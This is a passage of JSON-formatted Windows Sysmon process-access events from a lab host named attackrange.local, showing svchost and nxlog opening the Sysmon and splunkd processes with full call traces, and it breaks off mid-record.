{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.630\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.630","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1405,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1406,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\